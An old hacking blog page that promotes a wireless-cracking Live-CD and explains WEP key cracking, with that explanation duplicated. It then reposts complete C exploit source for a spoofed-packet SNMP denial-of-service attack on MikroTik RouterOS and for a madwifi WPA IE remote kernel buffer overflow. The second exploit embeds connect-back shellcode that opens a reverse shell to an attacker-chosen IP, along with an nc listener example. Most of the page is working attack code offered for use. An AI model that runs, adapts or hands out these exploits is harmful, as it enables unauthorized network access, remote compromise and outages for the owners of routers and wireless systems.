Sabtu, 19 April 2008

Wireless Hacking Live-CD - FBI version

By Yudhax



Five InterChangeAble Mirrors By Tâñvïr¥û$ûF For RapidSearching.CoM

Live Cd For Wireless Hacking, Also Used By The Fbi
This version is for all systems except systems with the Intel B/G wireless cards (IPW2200).
- Live CD with all the tools you need to hack a WLAN / wireless Access point -
Linux Live-CD - OS runs from CD - 635 mb - .iso
- also used by the FBI …

WEP Hacking - The Next Generation

WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products. WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.
Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long. A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of “strong” encryption while a 128 bit key has 104. The IV is placed in encrypted frame’s header, and is transmitted in plain text.
Traditionally, crac*ing WEP keys has been a slow and boring process. An attacker would have to capture hundreds of thousands or millions of packets—a process that could take hours or even days, depending on the volume of traffic passing over the wireless network. After enough packets were captured, a WEP crac*ing program such as Aircrac* would be used to find the WEP key.
Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared. This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours. As Special Agent Bickers noted, “It doesn’t matter if you use 128 bit WEP keys, you are vulnerable!”
WEP is an encryption scheme, based on the RC-4 cipher, that is available on all 802.11a, b and g wireless products.
WEP uses a set of bits called a key to scramble information in the data frames as it leaves the access point or client adapter and the scrambled message is then decrypted by the receiver.
Both sides must have the same WEP key, which is usually a total of 64 or 128 bits long.
A semi-random 24 bit number called an Initialization Vector (IV), is part of the key, so a 64 bit WEP key actually contains only 40 bits of “strong” encryption while a 128 bit key has 104.
The IV is placed in encrypted frame’s header, and is transmitted in plain text.
Traditionally, cracking WEP keys has been a slow and boring process.
An attacker would have to capture hundreds of thousands or millions of packets a process that could take hours or even days, depending on the volume of traffic passing over the wireless network.
After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key.
Fast-forward to last summer, when the first of the latest generation of WEP cracking tools appeared.
This current generation uses a combination of statistical techniques focused on unique IVs captured and brute-force dictionary attacks to break 128 bit WEP keys in minutes instead of hours.
Basic Directions:

1)Boot from cd
2)get the wep key
3)write it down
4)reboot into windows
5)connect using wep key.

dDos Mikrotik OS

By Yudhax

File Publish of,  damned shit...
Good progress bro...

/* --------------------------------------------------------------------------
* (c) ShadOS 2008
* _ _ _ _ _ __ _ _ _
* | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___
* | __ / -_) | | ' <| ' \| / _` | ' \ _(_-<
* |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/
* hellknights.void.ru |___/ .0x48k.
*
* --------------------------------------------------------------------------
*
* MicroTik RouterOS <=3.2 SNMPd snmp-set DoS exploit. Other OSs may be vulnurable (fe. Linux )
* Don't forget to visit our site and my homepage for new releases:
* http://hellknights.void.ru
* http://shados.freeweb7.com
* Also, you can mail me any bugs or suggestions:
* mailto: shados /at/ mail /dot/ ru
*
* Thanks 2 antichat.ru and all my friends.
* --------------------------------------------------------------------------
*
* Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2, or (at your option)
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software Foundation,
* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*
* --------------------------------------------------------------------------
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netdb.h>
#include <memory.h>
#include <string.h>

char evilcode[] = {
0x19, 0x02, 0x02, 0x1e, 0x0c, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0d, 0x30, 0x0b, 0x06, 0x07, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x05, 0x00, 0x00
};


unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

while (nleft > 1) {
sum += *w++;
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 17) + (sum & 0xffff);
sum += (sum >> 17);
answer = -sum;
return (answer);
}

int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len)
{
char *packet;
struct sockaddr_in dstaddr;
struct iphdr *ip;
struct udphdr *udp;
packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len);
memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len);
if (packet == NULL) { perror("Malloc failed\n"); exit(-1); }
ip = (struct iphdr *)packet;
udp = (struct udphdr *)(packet+sizeof(struct iphdr));
ip->saddr = *saddr;
ip->daddr = *daddr;
ip->version = 4;
ip->ihl = 5;
ip->ttl = 255;
ip->id = htons((unsigned short) rand());
ip->protocol = IPPROTO_UDP;
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len);
ip->check = in_cksum(ip, sizeof(struct iphdr));
udp->source = htons(sport);
udp->dest = htons(dport);
udp->len = htons(sizeof(struct udphdr) + len);
memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len);
dstaddr.sin_family = AF_INET;
dstaddr.sin_addr.s_addr = *daddr;
if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0)
perror("sendto() failed");
free(packet);
}

char * makereq(char *community,int *size)
{
char *buf;
char *ptr;
int len;
int i;

len = 5 + strlen(community) + sizeof(evilcode);
buf = (char *)malloc(len);
ptr = buf;

*ptr++ = 0x30;
*ptr++ = len;

/* Snmp Version */
*ptr++ = 0x02;
*ptr++ = 0x01;
*ptr++ = 0x00;

/* Community */
*ptr++ = 0x04;
*ptr++ = strlen(community);
strcpy(ptr,community);
ptr = ptr + strlen(community);


*ptr++ = 0xa3; /* Set Request */

memcpy(ptr, evilcode, sizeof(evilcode));
ptr = ptr + sizeof(evilcode);

*size = len+2;
return buf;
}

int erexit(char *msg)
{
printf("%s\n",msg);
exit (-1) ;
}

int usage()
{
printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n");
}

int main(int argc, char **argv)
{
char *saddr,*daddr,*community;
unsigned char *buf;
int size;
int sock;
unsigned long lsaddr,ldaddr;
int i;

saddr = NULL;
daddr = NULL;
if (argc != 7) { usage(); erexit("not enough args\n"); }

if (!strcmp(argv[1],"-s"))
saddr = strdup(argv[2]);
if (!strcmp(argv[3],"-d"))
daddr = strdup(argv[4]);
if (!strcmp(argv[5],"-c"))
community = strdup(argv[6]);

printf("Ok, spoofing packets from %s to %s\n",saddr,daddr);

if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1)
erexit("Invalid source/destination IP address\n");

if (saddr == NULL) { usage(); erexit("No Source Address"); }
if (daddr == NULL) { usage(); erexit("No Dest Address"); }

sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);
if (sock == -1)
erexit("Couldnt open Raw socket!(Are you root?)\n");

lsaddr = inet_addr(saddr);
ldaddr = inet_addr(daddr);

buf = makereq(community,&size);

sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size);
fprintf(stdout,"Sent packet. SNMPd must be down.\n");
return 0;

}

WPA/RSN IE remote kernel buffer overflow

So nice... sgrakkyu, thanks bro..
antifork.org


/* ---- madwifi WPA/RSN IE remote kernel buffer overflow ------
* expoit code by: sgrakkyu <at> antifork.org -- 10/1/2007
*
* CVE: 2006-6332 (Laurent BUTTI, Jerome RAZNIEWSKI, Julien TINNES)
*
* (for wpa)
* ....
* memcpy(buf, se->se_wpa_ie, se->se_wpa_ie[1] + 2)
* ....
* ....
* the function re-uses args in the stack before returning so we
* can't trash them overwriting.
* Different compiled module [ex. different version of gcc] may require
* a different pad value.. (see -g option)
*
* ex:
* on one terminal runs: nc -l -p 31337
* phi:~/kexec/lorcon# gcc -g -o madwifi_exp madwifi_exp.c -lorcon
* phi:~/kexec/lorcon# wlanconfig ath1 create wlandev wifi0 wlanmode monitor
* phi:~/kexec/lorcon# ifconfig ath1 up
* phi:~/kexec/lorcon# ./madwifi_exp -i ath1 -d madwifing -a 10.0.0.1 -p 31337
* [opt-ip]: 10.0.0.1
* [opt-port]: 31337
* [opt-iface]: ath1
* [opt-driver]: madwifing
* [opt-jump]: 0xffffe777
* [pad]: 36
*
* [*][Low Avail Byte]: 103
* [*][High Avail Byte]: 47
* [*][u_code[] (high)size]: 91, [ring0_code[] (low)size]: 47
* [*][ patching jump ]: [eba7]
* [*][Payload space]: 192
* [*][beacon_frame-80211]=54
* [*][beacon_WPA_IE_lenght]: 198
*
* [printing frame - start]
* 80 00 00 00 ff ff ff ff ff ff cc cc cc cc cc cc
* cc cc cc cc cc cc 00 00 00 00 00 00 00 00 00 00
* 64 00 01 00 00 03 41 41 41 01 08 82 84 8b 96 0c
* 18 30 48 03 01 0b dd c6 00 50 f2 01 01 00 90 90
* 90 90 90 90 90 90 90 90 90 90 31 c0 89 c3 40 40
* ....
* ....
*
*
* Tuning option:
* - depending on gcc version/optimization we have to change the padding of vector
* payload, take a look to the following disassembly of the module wlan.o compiled
* with gcc-4.0 (kernel compiled for i586):
*
* 00015a49 <giwscan_cb>:
* 15a49: 55 push %ebp
* 15a4a: 57 push %edi
* 15a4b: 56 push %esi
* 15a4c: 53 push %ebx
* 15a4d: 81 ec c4 00 00 00 sub $0xbc,%esp <--16+188=[204]
* .........
* .........
* .........
* 15fc3: 8d 54 24 12 lea 0xa(%esp),%edx <-esp+[10]
* 15fc7: 89 d7 mov %edx,%edi
* ...
* ...
* 15fd5: f3 a5 rep movsl %ds:(%esi),%es:(%edi)
*
*
* this is not a rule, check gcc generated code to calculate correct pad value :
* [startbuf-ret] = (16 + 188 - 10) = 194 byte
* PAD = 194 - SHELLCODE_SPACE - IEWPAheader(code,len,oui) = 194 - 150 - 8 = 36
* ( -g 36 would be the choice in that case)
*
* NOTE: 1) the remote box must call the ioctl() SIOCGIWSCAN
* for ex. when the iface gets up or during iwlist iface scanning
* command
*
* 2) if you need more space for kernel mode code you can rely on
* struct ieee80211_scan_entry paramter of gwiscan_cb()
* function to access the real frame (a trivial joke)
*
* 3) i had no time to test this exploit on other boxes..:
* tested only on: Slackware 10 - madwifi 0.9.2
* Kubuntu - kernel 2.6.17 - madwifi 0.9.2
*
*
* TNX TNX TNX twiz <at> antifork.org
*/


#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <getopt.h>
#include <netinet/in.h>
#include <sys/socket.h>

#include <tx80211.h>
#include <tx80211_packet.h>
#include <linux/wireless.h>
#include <arpa/inet.h>


/* 2.6.17 VSYSCALL: for >= 2.6.18 without fixed-vsyscall entry use kernel hardcoded value */
#define VSYSCALL_JMP_ESP_OFFSET 0xffffe777
#define IE_ZERO 0x00000000

#define FIX_BYTE(base,offset,byte) *(((unsigned char*)base) + offset) = byte;
#define FIX_WORD(base,offset,word) *((unsigned short *)((unsigned char*)base + offset)) = word;
#define FIX_DWORD(base,offset,dword) *((unsigned int *)((unsigned char*)base + offset)) = dword;

/* shellcode max buffer */
/* 8 bytes used for lenght + oui */
#define SHELLCODE_SPACE 150
#define PAD_SPACE 36

#define PAYLOAD_SPACE (SHELLCODE_SPACE + pad_space + 4 + 2)
#define TOTAL_PACKET_LEN (sizeof(beacon_80211_wpa) -1 + PAYLOAD_SPACE)

/* exp option */
char *iface = NULL; /* needed */
char *driver = NULL; /* needed */
char *ip = NULL; /* needed */
short port = 0; /* needed */
unsigned int jmp_address = VSYSCALL_JMP_ESP_OFFSET;
unsigned int pad_space = PAD_SPACE;



/* ----------------------------------- */

#define SUB_OFFSET_PATCH 8
char ring0_code[]=
"\xe8\x00\x00\x00\x00" //call 8048359 <main+0x21>
"\x5e" //pop %esi
"\x81\xee\x88\x00\x00\x00" //sub $0x88,%esi /* PATCH */
"\x31\xc0" //xor %eax,%eax
"\xb0\x04" //mov $0x4,%al
"\x01\xc4" //add %eax,%esp
"\x83\x3c\x24\x73" //cmp $0x73,%esp
"\x75\xf8" //jne 8048364 <main+0x2c>
"\x83\x7c\x24\x0c\x7b" //cmpl $0x7b,0xc(%esp)
"\x75\xf1" //jne 8048364 <main+0x2c>
"\x29\xc4" //sub %eax,%esp
"\x8b\x7c\x24\x0c" //mov 0xc(%esp),%edi
"\x89\x3c\x24" //mov %edi,(%esp)
"\x31\xc9" //xor %ecx,%ecx
"\xb1\x5b" //mov $0x5b,%cl /* FIX */
"\xf3\xa4" //rep movsb %ds:(%esi),%es:(%edi)
"\xcf"; //iret


/* connect back */
#define IP_OFFSET 35
#define PORT_OFFSET 44
char u_code[] =
"\x31\xc0\x89\xc3\x40\x40\xcd\x80\x39\xc3\x74\x03\x31\xc0\x40\xcd\x80" /* fork */
"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5d"
"\xbe"
"\xf5\xff\xff\xfe" // ~ip
"\xf7\xd6\x56\x66\xbd"
"\x69\x7a" // port
"\x0f\xcd\x09\xdd\x55\x43\x6a\x10\x51\x50\xb0\x66\x89\xe1\xcd\x80\x87\xd9"
"\x5b\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xdf";


/* 802.11header + WPA IE prolog */
#define WPA_LEN_OFFSET 55
#define CHANNEL 11
char beacon_80211_wpa[] =
"\x80" // management frame / subtype beacon
"\x00" // flags
"\x00\x00" // duration
"\xFF\xFF\xFF\xFF\xFF\xFF" // destination addr
"\xCC\xCC\xCC\xCC\xCC\xCC" // src address
"\xCC\xCC\xCC\xCC\xCC\xCC" // bbsid
"\x00\x00" // seq
"\x00\x00\x00\x00\x00\x00\x00\x00" // timestamp
"\x64\x00" // interval
"\x01\x00" // caps
"\x00\x03\x41\x41\x41" // ssid Information Element
"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" // rates Information Element
"\x03\x01\x0B" // channel Information Element (11)
"\xdd\xc6" // WPA Information Element (priv ID + len) (0xc6 = 0xc0 + 6) /* PATCH */
"\x00\x50\xf2\x01\x01\x00"; // oui + type + version (first 6 byte of len)

#define JUMP_OFFSET_PATCH 1
char jmp_back[]="\xeb\x00";

/* ----------------------------------- */


void usage(char *prog)
{
printf("[usage]: %s (-i iface) (-d drivername) (-a ip) (-p port) [-g pad] [-j jump_address]\n", prog);
}

unsigned char *build_frame()
{
int i,j;
char *frame = malloc(TOTAL_PACKET_LEN);
char *ptr = frame;

unsigned int hsb = sizeof(ring0_code)-1;
unsigned int lsb = SHELLCODE_SPACE - hsb;
printf("[*][low-kcode]: %d\n[*][high-ucode]: %d\n",
lsb, hsb);

printf("[*][u_code[] (high)size]: %d, [ring0_code[] (low)size]: %d\n",
sizeof(u_code)-1, sizeof(ring0_code)-1);

/* fix jump */
int b = -4 - pad_space - (sizeof(jmp_back)-1) - (sizeof(ring0_code)-1);
FIX_BYTE(jmp_back, JUMP_OFFSET_PATCH, b);

/* fix ring0_code/u_code displacement */
unsigned int sub = 5 + (sizeof(u_code)-1);
FIX_BYTE(ring0_code, SUB_OFFSET_PATCH, sub);

printf("[*][payload space]: %d\n", PAYLOAD_SPACE);

/* fix beacon_80211_wpa: WPA len */
FIX_BYTE(beacon_80211_wpa, WPA_LEN_OFFSET, PAYLOAD_SPACE + 6);
printf("[*][beacon_WPA_IE_lenght]: %u\n",
(unsigned char)beacon_80211_wpa[WPA_LEN_OFFSET]);

/* fill frame */
memset(frame, 0x00, TOTAL_PACKET_LEN);

memcpy(ptr, beacon_80211_wpa, sizeof(beacon_80211_wpa)-1);
ptr += (sizeof(beacon_80211_wpa)-1);

memset(ptr, 0x90, lsb - (sizeof(u_code)-1));
ptr += (lsb - (sizeof(u_code)-1));

memcpy(ptr, u_code, sizeof(u_code) -1);
ptr += (sizeof(u_code) -1);

memcpy(ptr, ring0_code, sizeof(ring0_code)-1);
ptr += sizeof(ring0_code)-1;

for(i=0; i<pad_space; i+=4)
*((unsigned int *)(ptr + i)) = (IE_ZERO+(i/4));

ptr += pad_space;

*((unsigned int *)(ptr)) = jmp_address;
ptr += 4;

memcpy(ptr, jmp_back, sizeof(jmp_back)-1);
ptr += sizeof(jmp_back)-1;

return (unsigned char*)frame;
}

void print_frame(unsigned char *frame, unsigned int size)
{
int i;
printf("\n[printing frame - start]\n ");
for(i=1; i<=size; i++)
{
printf("%02x ", frame[i-1]);
if((i % 16) == 0)
printf("\n ");
}
printf("\n[printing frame - end]\n");
}

void parse_arg(int argc, char **argv)
{
int opt;
struct in_addr in;
while( (opt=getopt(argc, argv, "j:i:a:p:d:g:")) != EOF)
{
switch(opt)
{
case 'j':
jmp_address = strtoll(optarg, NULL, 16);
break;
case 'a':
ip = strdup(optarg);
inet_aton(ip, &in);
FIX_DWORD(u_code, IP_OFFSET, ~(in.s_addr));
break;
case 'p':
port = atoi(optarg);
FIX_WORD(u_code, PORT_OFFSET, port);
break;
case 'd':
driver = strdup(optarg);
break;
case 'i':
iface = strdup(optarg);
break;
case 'g':
pad_space = atoi(optarg);
break;
default:
usage(argv[0]);
exit(1);
}
}
}


int main(int argc, char *argv[])
{
int i=0;
struct tx80211 in_tx;
struct tx80211_packet in_packet;
int drivertype;

parse_arg(argc, argv);

if(!iface || !driver || !ip || !port)
{
usage(argv[0]);
exit(1);
}

printf( "\n\nMadwifi 0.9.2 WPA/RSN IE buffer overflow\n\t exploit code: sgrakkyu <at> antifork.org\n"
"-------------------- **** ------------------\n"
"[opt-ip]: %s\n[opt-port]: %d\n[opt-iface]: %s\n[opt-driver]: %s\n[opt-jump]: 0x%08x\n[pad]: %d\n"
"-------------------- **** ------------------\n\n",
ip, port, iface, driver, jmp_address, pad_space);

unsigned char *frame = build_frame();
print_frame(frame, TOTAL_PACKET_LEN);

/* Use the command-line argument as the desired driver type */
drivertype = tx80211_resolvecard(driver);

/* Validate the driver name specified */
if (drivertype == INJ_NODRIVER)
{
fprintf(stderr, "Driver name not recognized.\n");
return -1;
}

if (tx80211_init(&in_tx, iface, drivertype) < 0) {
fprintf(stderr, "Error initializing drive \"%s\".\n", argv[1]);
return -1;
}

if ((tx80211_getcapabilities(&in_tx) & TX80211_CAP_CTRL) == 0)
{
fprintf(stderr, "Driver does not support transmitting control frames.\n");
return -1;
}

if (tx80211_setchannel(&in_tx, CHANNEL) < 0)
{
fprintf(stderr, "Error setting channel.\n");
return 1;
}

if (tx80211_open(&in_tx) < 0)
{
fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname);
return 1;
}

/* Initialized in_packet with packet contents and length of the packet */
in_packet.packet = frame;
in_packet.plen = TOTAL_PACKET_LEN;

printf("[sending packets]: about 10 a second\n");

while(i < 10000)
{
/* Transmit the packet */
if (tx80211_txpacket(&in_tx, &in_packet) < 0)
{
fprintf(stderr, "Unable to transmit packet.\n");
perror("txpacket");
return 1;
}
i++;
usleep(100000);
}
/* Close the socket after transmitting the packet */
tx80211_close(&in_tx);

return 0;
}